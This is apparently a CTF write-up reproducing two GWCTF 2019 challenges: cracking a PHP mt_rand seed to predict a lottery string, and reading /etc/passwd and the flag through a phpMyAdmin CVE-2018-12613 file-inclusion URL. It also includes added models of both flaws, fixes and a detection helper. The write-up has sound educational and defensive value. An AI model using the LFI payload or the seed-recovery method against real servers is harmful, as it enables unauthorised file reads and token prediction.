
GWCTF 2019 WP - Reproduction

I didn't manage to solve these during GWCTF 2019 itself. I'm such a noob!

枯燥的抽奖 (Boring Lottery)


We are asked to guess the last ten characters. Looking at the page source, the JS points to check.php.

The page displays 8y6CBQcJaW, and check.php is:

```php
<?php
# This is not the lottery program's source code! No peeking!
header("Content-Type: text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['seed'])){
$_SESSION['seed']=rand(0,999999999);
}

mt_srand($_SESSION['seed']);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
$str_show = substr($str, 0, 10);
echo "<p id='p1'>".$str_show."</p>";


if(isset($_POST['num'])){
    if($_POST['num']===$str){
        echo "<p id=flag>抽奖,就是那么枯燥且无味,给你flag{xxxxxxxxx}</p>";
    }
    else{
        echo "<p id=flag>没抽中哦,再试试吧</p>";
    }
}
show_source("check.php");
```

Following the approach written up by wonderkun (a true master): use the "private key" to guess the "public key".

First, put the ten characters it gave us into this script:

```python
# Turns the ten known characters into php_mt_seed's input format:
# one group "value value range_min range_max" per mt_rand() call, i.e.
# "j j 0 61" means the call mt_rand(0, 61) returned exactly j.
str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = '8y6CBQcJaW'          # the ten characters shown by check.php
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # index j in the alphabet is the value mt_rand(0, 61) produced
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)
```

Then feed that output to the php_mt_seed tool to crack the seed.

php_mt_seed has to be built first: run make, which compiles php_mt_seed.c into the php_mt_seed binary, and then use it. The exact commands are in its README.

We get the seed, and regenerate the whole string with it:

```php
<?php
// 342457593 is the seed php_mt_seed recovered from the ten known characters
mt_srand(342457593);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str = '';
$len1 = 20;
for ($i = 0; $i < $len1; $i++) {
    $str .= substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
echo "<p id='p1'>" . $str . "</p>";
```

That gives us all twenty characters.

Thanks to 晓黑: I had been running this on PHP 5.3 and forgot to switch; remember to use PHP 7.1 or above.
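Why php_mt_seed can do this at all, as an added example that is not part of the writeup or the challenge: the twenty characters are a pure function of a seed drawn from rand(0, 999999999), i.e. fewer than 2^30 candidates, and nothing else. The Python below models PHP 7.1+ mt_srand()/mt_rand() (standard MT19937 seeding plus the rejection-sampling range reduction PHP uses since 7.1), reproduces check.php's string from a seed, and shows the fix: draw the string from the OS CSPRNG so there is no seed to recover. The assumption that the target runs PHP 7.1 or later matches the writeup's note above; the class and function names are mine.

```python
import secrets

# Character set used by check.php on the page.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
MASK32 = 0xFFFFFFFF


class MT19937:
    """Plain MT19937 seeded the way PHP 7.1+ mt_srand(int) seeds it
    (the classic init_genrand recurrence). Assumption: PHP >= 7.1, where
    PHP's generator matches the reference algorithm."""
    N, M = 624, 397

    def __init__(self, seed):
        self.mt = [0] * self.N
        self.mt[0] = seed & MASK32
        for i in range(1, self.N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & MASK32
        self.index = self.N          # force a twist before the first output

    def _twist(self):
        for i in range(self.N):
            y = (self.mt[i] & 0x80000000) | (self.mt[(i + 1) % self.N] & 0x7FFFFFFF)
            v = self.mt[(i + self.M) % self.N] ^ (y >> 1)
            if y & 1:
                v ^= 0x9908B0DF
            self.mt[i] = v
        self.index = 0

    def next_u32(self):
        """One raw 32-bit output (what php_mt_rand() returns internally)."""
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & MASK32


def raw_outputs(seed, n):
    """First n raw outputs for a seed; handy for checking against known vectors."""
    mt = MT19937(seed)
    return [mt.next_u32() for _ in range(n)]


def php_mt_rand_range(mt, lo, hi):
    """mt_rand(lo, hi) as PHP 7.1+ computes it: rejection sampling so the
    result is uniform, then a modulo into the range (models rand_range32)."""
    umax = hi - lo
    if umax == MASK32:
        return lo + mt.next_u32()
    umax += 1
    if umax & (umax - 1) == 0:                 # power of two: mask, no bias
        return lo + (mt.next_u32() & (umax - 1))
    limit = MASK32 - (MASK32 % umax) - 1       # discard above this to avoid bias
    r = mt.next_u32()
    while r > limit:
        r = mt.next_u32()
    return lo + r % umax


def lottery_string(seed, length=20):
    """Reproduces check.php: seed once, then draw `length` characters."""
    mt = MT19937(seed)
    return "".join(ALPHABET[php_mt_rand_range(mt, 0, len(ALPHABET) - 1)]
                   for _ in range(length))


def secure_lottery_string(length=20):
    """What check.php should do instead: draw from the OS CSPRNG (in PHP,
    random_int() or random_bytes()), so the shown prefix leaks nothing."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    # 342457593 is the seed the writeup reports recovering with php_mt_seed.
    full = lottery_string(342457593)
    print("shown to the player:", full[:10])
    print("must be guessed:    ", full[10:])
    print("secure alternative: ", secure_lottery_string())
```

The PHP-version remark above is exactly why a model like this has to pick a version: before 7.1, mt_rand(min, max) scaled the 31-bit output with floating-point arithmetic instead of the rejection loop modelled in php_mt_rand_range, so a seed that reproduces the prefix on 7.1 will not reproduce it on 5.3 and vice versa.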

我有一个数据库 (I Have a Database)

We find phpMyAdmin, and can hit it directly with an existing PoC:

http://ip:port/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../etc/passwd

That works, so try the flag:

?target=db_datadict.php%253f/../../../../../../../../flag

Reference: CVE-2018-12613 - phpMyAdmin authenticated local file inclusion
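What the PoC above exploits, as an added example in Python that is neither the PoC nor phpMyAdmin's code: the target parameter is validated against a page whitelist on one representation (URL-decoded once more and cut at the first "?") but included using the raw value. The %253f in the URL becomes %3f after the web server's decode, so the check sees "db_datadict.php" while the include sees a path that climbs out of the web root. The whitelist, the web-root path and the function names below are constructed assumptions; the path resolution uses posixpath.normpath to model lexical ".." handling.

```python
import posixpath
from urllib.parse import unquote

# Constructed stand-in for the page whitelist; the real one is longer.
GOTO_WHITELIST = {"db_datadict.php", "db_sql.php", "tbl_sql.php"}
WEBROOT = "/var/www/html/phpmyadmin"      # assumed install path


def flawed_target_check(target):
    """Models the pre-fix pattern (assumption: shape of the CVE-2018-12613
    bug, not its code): the whitelist is also tested against a copy that
    has been urldecoded a second time and truncated at the first '?'."""
    if target in GOTO_WHITELIST:
        return True
    if target.split("?", 1)[0] in GOTO_WHITELIST:
        return True
    decoded = unquote(target).split("?", 1)[0]   # the extra decode is the bug
    return decoded in GOTO_WHITELIST


def fixed_target_check(target):
    """Check byte-for-byte the value that will be included: exact match only,
    no decoding, no suffix stripping."""
    return target in GOTO_WHITELIST


def resolved_include_path(target):
    """Where an include of `target` relative to WEBROOT lands once '..'
    components are collapsed (models lexical path expansion; a component
    that does not exist, like 'db_datadict.php%3f', is still stepped over)."""
    return posixpath.normpath(posixpath.join(WEBROOT, target))


def suspicious_target(target, max_decodes=2):
    """Log-review helper: flag a target value that contains '..' in any of
    its first few decoding layers (catches %2e%2e and %252e%252e forms)."""
    value = target
    for _ in range(max_decodes + 1):
        if ".." in value:
            return True
        value = unquote(value)
    return False


if __name__ == "__main__":
    # The page's payload after the web server decoded %253f once.
    payload = "db_datadict.php%3f/../../../../../../../../etc/passwd"
    print("flawed check:", flawed_target_check(payload))
    print("fixed check: ", fixed_target_check(payload))
    print("would load:  ", resolved_include_path(payload))
    print("suspicious:  ", suspicious_target("db_datadict.php%253f/../../../../../../../../flag"))
```

The durable lesson is the check-versus-use mismatch: whatever transformation the consumer applies to the value (decoding, truncation, path normalisation), the validator must apply exactly the same one or, better, compare the exact string that will be used.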